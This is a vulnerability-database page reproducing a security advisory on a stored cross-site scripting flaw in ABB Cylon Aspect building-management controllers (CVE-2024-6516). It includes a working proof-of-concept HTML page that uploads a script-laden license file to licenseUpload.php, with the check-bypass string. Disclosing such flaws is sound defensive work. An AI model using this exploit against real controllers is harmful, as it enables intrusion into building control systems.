Vulners
Lucene search
ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | ABB Cylon Aspect 3.08.02 bbmdUpdate.php Remote Code Execution Vulnerability | 9 Jan 202500:00 | – | zdt |
 | The vulnerability of microprogramming software in embedded network control devices of ASPECT Enterprise, NEXUS Series, and MATRIX Series is related to the lack of measures taken to protect the website structure. This allows attackers to carry out XSS attacks. | 9 Dec 202400:00 | – | bdu_fstec |
 | CVE-2024-6516 | 5 Dec 202412:47 | – | circl |
 | ABB ASPECT 安全漏洞 | 5 Dec 202400:00 | – | cnnvd |
 | CVE-2024-6516 | 5 Dec 202412:24 | – | cve |
 | CVE-2024-6516 Cross Site Scripting XSS | 5 Dec 202412:24 | – | cvelist |
 | ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting | 15 Apr 202500:00 | – | exploitdb |
| ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution | 15 Apr 202500:00 | – | exploitdb |
 | EUVD-2024-47995 | 3 Oct 202520:07 | – | euvd |
 | Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series | 6 Dec 202411:49 | – | ncsc |
10
ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
stored cross-site scripting (XSS) vulnerability. This can be exploited by
uploading a malicious .txt file containing an XSS payload, which is stored
on the server and served back to users. Although the filename is sanitized
via the filename POST parameter, the file contents are not inspected or
sanitized, allowing attackers to inject arbitrary client-side scripts that
execute in the context of any user accessing the infected file or related
web page (license.php). To bypass file upload checks, the request must include
the Variant string enabling the upload process for potential exploitation.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5905
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php
CVE ID: CVE-2024-6516
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<html>
<body>
<script>
function storeit()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true);
xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
xhr.withCredentials = true;
var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
"Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" +
"Content-Type: text/lic\r\n" +
"\r\n" +
"Variant = AspectMAX\r\n" +
"\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" +
"------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
storeit();
</script>
<form action="#">
<input type="button" value="Post" onclick="storeit();" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1 - 9
CVSS 49.3
EPSS0.01078
SSVC